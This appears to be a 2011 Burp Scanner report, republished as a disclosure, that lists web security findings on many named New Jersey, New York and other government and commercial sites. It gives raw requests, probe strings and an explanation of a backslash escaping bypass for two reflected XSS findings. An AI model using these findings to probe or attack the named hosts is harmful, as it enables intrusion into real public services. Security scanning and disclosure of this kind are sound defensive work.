XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07132011-01

Report generated by Burp Scanner at Wed Jul 13 06:55:20 CDT 2011.


Contents

1. Cross-site scripting (reflected)

1.1. https://hi.state.nj.us/DOBI_RELOLTRF/* [REST URL parameter 2]

1.2. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/js/auth.js [psScriptReferrer parameter]

1.3. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/js/auth.js [psScriptReferrer parameter]

1.4. http://www.nysegov.com/citGuide.cfm [content parameter]

1.5. http://www.nysegov.com/citGuide.cfm [superCat parameter]

1.6. http://medienfreunde.com/lab/innerfade/ [Referer HTTP header]

2. Cleartext submission of password

2.1. http://visitnj.org/

2.2. http://www.visitnj.org/events

2.3. http://www.visitnj.org/new-jerseys-wineries

3. SSL cookie without secure flag set

3.1. https://www.mybenefits.ny.gov/

3.2. https://www1.state.nj.us/TYTR_Saver/jsp/common/Login.jsp

3.3. https://maps-api-ssl.google.com/maps

3.4. https://market.android.com/reviews/components

3.5. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/Login

3.6. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

3.7. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css

3.8. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js

3.9. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js

3.10. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js

3.11. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js

3.12. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js

3.13. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm

4. Session token in URL

4.1. http://de.gov/

4.2. http://server.iad.liveperson.net/hc/33511087/

4.3. http://www.delaware.gov/

4.4. http://www.njleg.state.nj.us/

4.5. http://www.njleg.state.nj.us/Default.asp

5. Flash cross-domain policy

5.1. http://nj.gov/crossdomain.xml

5.2. http://www.state.nj.us/crossdomain.xml

6. Cookie scoped to parent domain

6.1. http://www.cio.ny.gov/universal_broadband

6.2. http://www.opensource.org/licenses/gpl-3.0.html

6.3. http://www.opensource.org/licenses/mit-license.php

6.4. http://www.visitnj.org/events

6.5. http://www.visitnj.org/new-jerseys-wineries

6.6. http://ads.doclix.com/adserver/serve/js/banner_unit.jsp

6.7. http://ads.doclix.com/adserver/serve/js/pop_under_unit.jsp

6.8. http://id.google.com/verify/EAAAAO3u2e0fEjERBbAuho_q-WM.gif

6.9. http://images.apple.com/global/nav/styles/navigation.css

6.10. http://images.apple.com/ipod/images/gradient_texture20100901.jpg

6.11. https://maps-api-ssl.google.com/maps

6.12. http://maps.google.com/maps

6.13. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2

6.14. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/Login

6.15. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

6.16. http://www.facebook.com/NewJerseyLottery

6.17. http://www.facebook.com/feeds/page.php

6.18. http://www.google.com/

6.19. http://www.google.com/reviews/scripts/annotations_bootstrap.js

6.20. http://www.youtube.com/NewJerseyGovernment

6.21. http://www.youtube.com/newjerseylottery

7. Cookie without HttpOnly flag set

7.1. http://brothercake.com/site/resources/scripts/onload/

7.2. http://gillibrand.senate.gov/

7.3. http://iapps.courts.state.ny.us/webcivil/ecourtsMain

7.4. http://schumer.senate.gov/

7.5. http://visitnj.org/

7.6. http://www.benjaminsterling.com/experiments/jqShuffle/

7.7. http://www.cio.ny.gov/universal_broadband

7.8. http://www.cs.state.ny.us/

7.9. https://www.mybenefits.ny.gov/

7.10. http://www.njleg.state.nj.us/

7.11. http://www.njleg.state.nj.us/Default.asp

7.12. http://www.nydoctorprofile.com/welcome.jsp

7.13. http://www.opensource.org/licenses/gpl-3.0.html

7.14. http://www.opensource.org/licenses/mit-license.php

7.15. http://www.otda.state.ny.us/main/workingfamilies/default.asp

7.16. http://www.visitnj.org/events

7.17. http://www.visitnj.org/new-jerseys-wineries

7.18. https://www1.state.nj.us/TYTR_Saver/jsp/common/Login.jsp

7.19. https://www6.state.nj.us/LOT_LVC/LogAndLoad

7.20. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_0_vip_reg.jsp

7.21. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_S0_login.jsp

7.22. https://www6.state.nj.us/LOT_LVC/jsp/lvc2_0_vip_forgot.jsp

7.23. http://511ny.org/

7.24. http://ads.doclix.com/adserver/serve/js/banner_unit.jsp

7.25. http://ads.doclix.com/adserver/serve/js/pop_under_unit.jsp

7.26. http://images.apple.com/global/nav/styles/navigation.css

7.27. http://images.apple.com/ipod/images/gradient_texture20100901.jpg

7.28. http://israel.house.gov/

7.29. https://maps-api-ssl.google.com/maps

7.30. http://maps.google.com/maps

7.31. https://market.android.com/reviews/components

7.32. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2

7.33. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/Login

7.34. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

7.35. http://sdc.state.nj.us/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif

7.36. http://sdc.state.nj.us/dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif

7.37. http://server.iad.liveperson.net/hc/33511087/

7.38. http://server.iad.liveperson.net/hc/33511087/

7.39. http://server.iad.liveperson.net/hc/33511087/x.js

7.40. http://statse.webtrendslive.com/dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif

7.41. http://twitter.com/

7.42. http://www.facebook.com/NewJerseyLottery

7.43. http://www.facebook.com/feeds/page.php

7.44. http://www.google.com/

7.45. http://www.google.com/reviews/scripts/annotations_bootstrap.js

7.46. http://www.governor.ny.gov/

7.47. http://www.iloveny.com/

7.48. http://www.louise.house.gov/

7.49. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css

7.50. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js

7.51. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js

7.52. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js

7.53. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js

7.54. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js

7.55. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm

7.56. http://www.nylottery.org/index.php

7.57. http://www.recovery.ny.gov/

7.58. http://www.youtube.com/NewJerseyGovernment

7.59. http://www.youtube.com/newjerseylottery

8. Password field with autocomplete enabled

8.1. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/Login

8.2. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/signup/NJLoginNewUser

8.3. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

8.4. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/signup/NJLoginNewUser

8.5. http://twitter.com/

8.6. http://twitter.com/

8.7. http://twitter.com/

8.8. http://twitter.com/login

8.9. http://twitter.com/login

8.10. http://visitnj.org/

8.11. http://www.facebook.com/NewJerseyLottery

8.12. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm

8.13. http://www.state.nj.us/lottery/games/1-0_numbers_draw_games.htm

8.14. http://www.state.nj.us/lottery/home.shtml

8.15. http://www.state.nj.us/lottery/vip/3-0_vip_gen_info.htm

8.16. http://www.visitnj.org/events

8.17. http://www.visitnj.org/new-jerseys-wineries

8.18. https://www1.state.nj.us/TYTR_Saver/jsp/common/Login.jsp

8.19. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_0_vip_reg.jsp

8.20. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_S0_login.jsp

9. Source code disclosure

9.1. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js

9.2. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js

10. Referer-dependent response

11. Cross-domain POST

11.1. http://buerkle.house.gov/

11.2. http://buerkle.house.gov/

11.3. http://clarke.house.gov/

11.4. http://clarke.house.gov/

11.5. http://grimm.house.gov/

11.6. http://grimm.house.gov/

11.7. http://hanna.house.gov/

11.8. http://hanna.house.gov/

11.9. http://israel.house.gov/

11.10. http://israel.house.gov/

11.11. http://nj.gov/nj/includes/styles/slideshow.css

11.12. http://owens.house.gov/

11.13. http://owens.house.gov/

11.14. http://peteking.house.gov/

11.15. http://rangel.house.gov/

11.16. http://tonko.house.gov/

11.17. http://tonko.house.gov/

11.18. http://www.buckthebuckleupdog.org/

11.19. http://www.dos.state.ny.us/

11.20. http://www.gnu.org/licenses/gpl.html

11.21. http://www.louise.house.gov/

11.22. http://www.nj.gov/nj/includes/scripts/common_functions.js

11.23. http://www.nj.gov/nj/includes/scripts/custom_functions.js

11.24. http://www.state.nj.us/patentbank/feedback/

12. Cross-domain Referer leakage

12.1. http://ads.doclix.com/adserver/serve/js/pop_under_unit.jsp

12.2. http://climate.rutgers.edu/njwxnet/station.php

12.3. https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp

12.4. http://maps.google.com/maps

12.5. https://market.android.com/details

12.6. https://market.android.com/details

12.7. https://market.android.com/developer

12.8. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2

12.9. http://twitter.com/

12.10. http://twitter.com/

12.11. http://www.facebook.com/plugins/likebox.php

12.12. http://www.facebook.com/plugins/likebox.php

12.13. http://www.google.com/maps

12.14. http://www.google.com/search

12.15. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm

12.16. http://www.nysegov.com/citGuide.cfm

12.17. http://www.nysegov.com/citguide.cfm

12.18. http://www.search.state.ny.us/search

12.19. http://www.state.nj.us/lottery/about/6-0_about.htm

12.20. http://www.state.nj.us/lottery/didiwin/8-0_did_i_win.htm

12.21. http://www.state.nj.us/lottery/instant/2-0_instant_games.shtml

12.22. http://www.state.nj.us/lottery/multimedia/9-0_multimedia.htm

12.23. http://www.state.nj.us/lottery/news/5-0_news.htm

12.24. http://www.state.nj.us/lottery/retailer/7-0_retailer.htm

12.25. http://www.state.nj.us/lottery/vip/3-0_vip_gen_info.htm

12.26. http://www.state.nj.us/lottery/where/4-0_where.htm

13. Cross-domain script include

13.1. http://climate.rutgers.edu/njwxnet/station.php

13.2. http://code.google.com/p/swfobject/

13.3. http://code.google.com/p/swfobject/wiki/documentation

13.4. http://docs.jquery.com/Tutorials:Introducing_$(document

13.5. http://docs.jquery.com/UI

13.6. http://docs.jquery.com/UI/Effects/

13.7. https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp

13.8. http://grimm.house.gov/

13.9. http://israel.house.gov/

13.10. http://itunes.apple.com/app/delaware-fresh/id446665507

13.11. http://itunes.apple.com/us/app/delaware-gov/id444422872

13.12. http://javascript.nwbox.com/IEContentLoaded/

13.13. http://jquery.com/

13.14. http://jquery.malsup.com/cycle/

13.15. http://jqueryui.com/about

13.16. http://maloney.house.gov/

13.17. http://malsup.com/jquery/cycle/

13.18. https://market.android.com/details

13.19. https://market.android.com/developer

13.20. https://market.android.com/static/client/js/1968918977-site_js_compiled_site_js.js

13.21. http://medienfreunde.com/lab/innerfade/

13.22. http://nj.gov/education/

13.23. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2

13.24. http://peteking.house.gov/

13.25. http://qandanj.org/

13.26. http://rangel.house.gov/

13.27. http://tonko.house.gov/

13.28. http://twitter.com/login

13.29. http://visitnj.org/

13.30. http://webreflection.blogspot.com/2009/01/32-bytes-to-know-if-your-browser-is-ie.html

13.31. http://www.cio.ny.gov/universal_broadband

13.32. http://www.cs.state.ny.us/

13.33. http://www.delaware.gov/apps/

13.34. http://www.delaware.gov/topics/yourgovernment

13.35. http://www.destateparks.com/fees/entry/annual-pass.asp

13.36. http://www.dos.state.ny.us/

13.37. http://www.facebook.com/NewJerseyLottery

13.38. http://www.facebook.com/plugins/likebox.php

13.39. http://www.iloveny.com/

13.40. http://www.labor.state.ny.us/ui/ui_index.shtm

13.41. http://www.louise.house.gov/

13.42. http://www.nj.gov/njbusiness/

13.43. http://www.nj.gov/njbusiness/licenses/

13.44. http://www.nj.gov/njbusiness/registration/

13.45. http://www.nj.gov/njbusiness/starting/

13.46. http://www.nj.gov/njbusiness/tax/

13.47. http://www.nj.gov/njbusiness/workforce/

13.48. http://www.nysenate.gov/

13.49. http://www.opensource.org/licenses/gpl-3.0.html

13.50. http://www.opensource.org/licenses/mit-license.php

13.51. http://www.osc.state.ny.us/

13.52. http://www.osc.state.ny.us/ouf/index.htm

13.53. http://www.search.state.ny.us/search

13.54. http://www.state.nj.us/lottery/about/6-0_about.htm

13.55. http://www.state.nj.us/lottery/didiwin/8-0_did_i_win.htm

13.56. http://www.state.nj.us/lottery/games/1-0_numbers_draw_games.htm

13.57. http://www.state.nj.us/lottery/games/1-1_powerball.shtml

13.58. http://www.state.nj.us/lottery/games/1-2_mega_millions.shtml

13.59. http://www.state.nj.us/lottery/games/1-3_pick6.shtml

13.60. http://www.state.nj.us/lottery/games/1-4_jersey_cash5.shtml

13.61. http://www.state.nj.us/lottery/games/1-5_pick4.shtml

13.62. http://www.state.nj.us/lottery/games/1-6_pick3.shtml

13.63. http://www.state.nj.us/lottery/games/1-7_instant_match.htm

13.64. http://www.state.nj.us/lottery/home.shtml

13.65. http://www.state.nj.us/lottery/instant/2-0_instant_games.shtml

13.66. http://www.state.nj.us/lottery/multimedia/9-0_multimedia.htm

13.67. http://www.state.nj.us/lottery/news/5-0_news.htm

13.68. http://www.state.nj.us/lottery/news/p071111.htm

13.69. http://www.state.nj.us/lottery/news/p071111a.htm

13.70. http://www.state.nj.us/lottery/retailer/7-0_retailer.htm

13.71. http://www.state.nj.us/lottery/vip/3-0_vip_gen_info.htm

13.72. http://www.state.nj.us/lottery/where/4-0_where.htm

13.73. http://www.state.nj.us/treasury/doinvest/history3.html

13.74. http://www.state.nj.us/treasury/revenue/credcrd.htm

13.75. http://www.state.nj.us/treasury/revenue/dcr/geninfo/fees_pd.html

13.76. http://www.state.nj.us/treasury/revenue/dcr/geninfo/genserv.html

13.77. http://www.state.nj.us/treasury/revenue/dcr/geninfo/instform.html

13.78. http://www.state.nj.us/treasury/revenue/elffaq.htm

13.79. http://www.unclaimedproperty.nj.gov/

13.80. http://www.visitnj.org/events

13.81. http://www.visitnj.org/new-jerseys-wineries

13.82. http://www.youtube.com/NewJerseyGovernment

13.83. http://www.youtube.com/newjerseylottery

13.84. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_0_vip_reg.jsp

13.85. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_S0_login.jsp

13.86. https://www6.state.nj.us/LOT_LVC/jsp/lvc2_0_vip_forgot.jsp

14. Email addresses disclosed

14.1. http://assembly.state.ny.us/

14.2. http://climate.rutgers.edu/njwxnet/station.php

14.3. http://code.google.com/p/swfobject/

14.4. http://courts.delaware.gov/

14.5. http://grimm.house.gov/

14.6. http://hanna.house.gov/

14.7. http://jqueryui.com/about

14.8. http://maps.gstatic.com/cat_js/intl/en_us/mapfiles/353b/maps2/%7Bmod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw,mod_mg%7D.js

14.9. https://market.android.com/static/client/js/1968918977-site_js_compiled_site_js.js

14.10. http://nj.gov/nj/feedback.html

14.11. http://ny.gov/contactus/accessibility.html

14.12. http://ny.gov/privacy/index.html

14.13. http://peteking.house.gov/

14.14. http://qandanj.org/

14.15. http://serrano.house.gov/

14.16. http://twitter.com/account/bootstrap_data

14.17. http://webreflection.blogspot.com/2009/01/32-bytes-to-know-if-your-browser-is-ie.html

14.18. http://www.cio.ny.gov/universal_broadband

14.19. http://www.courts.state.ny.us/contactus/index.shtml

14.20. http://www.courts.state.ny.us/global

14.21. http://www.courts.state.ny.us/home.htm

14.22. http://www.courts.state.ny.us/privacy/index.shtml

14.23. http://www.courts.state.ny.us/publications/

14.24. http://www.courts.state.ny.us/whatsnew/

14.25. http://www.delaware.gov/apps/

14.26. http://www.facebook.com/feeds/page.php

14.27. http://www.gnu.org/licenses/gpl.html

14.28. http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

14.29. http://www.governor.ny.gov/

14.30. http://www.health.state.ny.us/health_care/epic/index.htm

14.31. http://www.health.state.ny.us/vital_records/

14.32. http://www.jerseyseafood.nj.gov/justforkids.html

14.33. http://www.judiciary.state.nj.us/

14.34. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js

14.35. http://www.nj.gov/donotcall/

14.36. http://www.njelections.org/how-where-register.html

14.37. http://www.njfishandwildlife.com/als/websalesintro.htm

14.38. http://www.njleg.state.nj.us/

14.39. http://www.njleg.state.nj.us/Default.asp

14.40. http://www.ny.gov/contactus/accessibility.html

14.41. http://www.ny.gov/privacy/index.html

14.42. http://www.nycourts.gov/ip/gfs/index.shtml

14.43. http://www.nyfirst.ny.gov/

14.44. http://www.nyhealth.gov/nysdoh/chplus/

14.45. http://www.nysegov.com/citguide.cfm

14.46. http://www.opensource.org/licenses/gpl-3.0.html

14.47. http://www.opensource.org/licenses/mit-license.php

14.48. http://www.state.nj.us/jerseyfresh/searches/pyo.htm

14.49. http://www.state.nj.us/lottery/about/6-0_about.htm

14.50. http://www.state.nj.us/lottery/vip/3-0_vip_gen_info.htm

14.51. http://www.state.nj.us/lottery/where/4-0_where.htm

14.52. http://www.state.nj.us/nj/feedback.html

14.53. http://www.state.nj.us/patentbank/feedback/

14.54. http://www.state.nj.us/treasury/privacy.shtml

14.55. http://www.state.nj.us/treasury/taxation/listservice.shtml

14.56. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_0_vip_reg.jsp

15. Private IP addresses disclosed

15.1. http://511ny.org/

15.2. http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css

15.3. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/sdwD1rGJXK2.css

15.4. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/OWWAkKnpuow.js

15.5. http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/fvZFkQjGc7h.js

15.6. http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css

15.7. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css

15.8. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/uOvB-PjImrg.js

15.9. http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/rK9hU7iYtfp.js

15.10. http://www.facebook.com/NewJerseyLottery

15.11. http://www.facebook.com/feeds/page.php

15.12. http://www.facebook.com/feeds/page.php

15.13. http://www.facebook.com/plugins/likebox.php

15.14. http://www.facebook.com/plugins/likebox.php

15.15. http://www.facebook.com/plugins/likebox.php

15.16. http://www.facebook.com/plugins/likebox.php

15.17. http://www.google.com/sdch/vD843DpA.dct

16. Credit card numbers disclosed

17. Robots.txt file

17.1. http://nj.gov/

17.2. http://sdc.state.nj.us/dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif

17.3. http://www.courts.state.ny.us/home.htm

17.4. http://www.state.nj.us/patentbank/

18. Cacheable HTTPS response

18.1. https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp

18.2. https://egov.dnrec.delaware.gov/egovpublic/js/MenuItems.js

18.3. https://maps-api-ssl.google.com/maps

18.4. https://maps-api-ssl.google.com/maps/api/js

18.5. https://market.android.com/details

18.6. https://market.android.com/developer

18.7. https://newyorkchildsupport.com/child_support_services.html

18.8. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/Login

18.9. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/selfservice/IDRetrieval

18.10. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/selfservice/PasswordReset

18.11. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/signup/NJLoginNewUser

18.12. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

18.13. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/selfservice/IDRetrieval

18.14. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/selfservice/PasswordReset

18.15. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/signup/NJLoginNewUser

18.16. https://www.state.nj.us/treas/treasmail.shtml

18.17. https://www.state.nj.us/treas/webmaster.shtml

18.18. https://www1.state.nj.us/

18.19. https://www1.state.nj.us/TYTR_Saver/jsp/common/Login.jsp

18.20. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_0_vip_reg.jsp

18.21. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_S0_login.jsp

18.22. https://www6.state.nj.us/LOT_LVC/jsp/lvc2_0_vip_forgot.jsp

18.23. https://wwwnet1.state.nj.us/GOV/OEG/NJPatentBank/AddPatent.aspx

18.24. https://wwwnet1.state.nj.us/GOV/OEG/NJPatentBank/PatentDetail.aspx

18.25. https://wwwnet1.state.nj.us/GOV/OEG/NJPatentBank/PatentSearchDisclaimer.aspx

18.26. https://wwwnet1.state.nj.us/GOV/OEG/NJPatentBank/Register.aspx

18.27. https://wwwnet1.state.nj.us/GOV/OEG/NJPatentBank/Search.aspx

19. Multiple content types specified

20. HTML does not specify charset

20.1. http://five.cdn-image.com/__media__/pics/291/search-field-bg.gif

20.2. http://jqueryui.com/about

20.3. http://legis.delaware.gov/images/spacer.gif

20.4. https://portal031.state.nj.us/*

20.5. http://public.leginfo.state.ny.us/menugetf.cgi

20.6. http://www.e-zpassny.com/

20.7. http://www.house.gov/velazquez/

20.8. http://www.judiciary.state.nj.us/kids/index.htm

20.9. http://www.nj.gov/mvc/online/driverhistory.shtml

20.10. http://www.nj.gov/mynj/myNJRestrHelp.html

20.11. http://www.nj.gov/nj/deptserv.html

20.12. http://www.nj.gov/nj/govinfo/njgov/alphaserv.html

20.13. http://www.opencube.com/

20.14. http://www.state.nj.us/health/vital/vital.htm

20.15. http://www.state.nj.us/lottery/

20.16. http://www.state.nj.us/lottery/instant/2-0_instant_games.htm

20.17. http://www.state.nj.us/mvc/online/roadtest.shtml

20.18. http://www.state.nj.us/nj/deptserv.html

20.19. http://www.state.nj.us/nj/govinfo/njgov/alphaserv.html

20.20. http://www.state.nj.us/transportation/commuter/trafficinfo/

20.21. http://www.state.nj.us/treasury/administration/grau/index.html

20.22. http://www.state.nj.us/treasury/pensions/index2.htm

20.23. http://www.state.nj.us/treasury/pensions/pers1.htm

20.24. http://www.state.nj.us/treasury/pensions/pfrs1.htm

20.25. http://www.state.nj.us/treasury/pensions/shbp.htm

20.26. http://www.state.nj.us/treasury/pensions/sprs1.htm

20.27. http://www.state.nj.us/treasury/pensions/tpaf1.htm

20.28. https://www1.state.nj.us/TYTR_Saver/jsp/common/Login.jsp

20.29. https://www16.state.nj.us/DOBI_BNKOLS/*

20.30. https://www16.state.nj.us/DOBI_DEPGUDPA/*

20.31. https://www16.state.nj.us/NJ_PREMIER_EBIZ/*

20.32. https://www16.state.nj.us/TYP_MBOSREG/*

21. Content type incorrectly stated

21.1. http://a0.twimg.com/profile_images/688563731/maud_newton_normal.jpg

21.2. http://a1.twimg.com/profile_images/458966890/twitterProfilePhoto_normal.jpg

21.3. http://a2.twimg.com/profile_images/368371941/saveur_icon_normal.gif

21.4. http://a3.twimg.com/profile_images/497483711/MMlogo_normal.gif

21.5. http://de.gov/images/favicon.ico

21.6. https://egov.dnrec.delaware.gov/egovpublic/js/MenuItems.js

21.7. https://hi.state.nj.us/DOBI_RELOLTRF/*

21.8. https://maps-api-ssl.google.com/maps/api/js

21.9. http://maps.google.com/maps/api/js

21.10. https://portal01.state.nj.us/favicon.ico

21.11. http://twitter.com/account/available_features

21.12. http://www.bi2technologies.com/poormanscron/run-cron-check

21.13. http://www.delaware.gov/images/favicon.ico

22. Content type is not specified

22.1. http://patft.uspto.gov/netacgi/nph-Parser

22.2. http://server.iad.liveperson.net/hc/33511087/

23. SSL certificate

23.1. https://portal01.state.nj.us/

23.2. https://wwwnet1.state.nj.us/



1. Cross-site scripting (reflected)  next
There are 6 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://hi.state.nj.us/DOBI_RELOLTRF/* [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://hi.state.nj.us
Path:   /DOBI_RELOLTRF/*

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript inline comment. The payload aa1d6*/2a7a5043949 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DOBI_RELOLTRF/*aa1d6*/2a7a5043949 HTTP/1.1
Host: hi.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 13 Jul 2011 01:52:09 GMT
Server: IBM_HTTP_Server
$WSEP:
Content-Length: 59
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US

Error 404: SRVE0190E: File not found: /*aa1d6*/2a7a5043949

1.2. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/js/auth.js [psScriptReferrer parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://portal01.state.nj.us
Path:   /http://portal20.sa.state.nj.us:8080/amserver/js/auth.js

Issue detail

The value of the psScriptReferrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ded1\'%3bde885b10c60 was submitted in the psScriptReferrer parameter. This input was echoed as 2ded1\\';de885b10c60 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /http://portal20.sa.state.nj.us:8080/amserver/js/auth.js?psScriptReferrer=2ded1\'%3bde885b10c60 HTTP/1.1
Host: portal01.state.nj.us
Connection: keep-alive
Referer: https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/Login?gw=portal01.state.nj.us&org=snj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
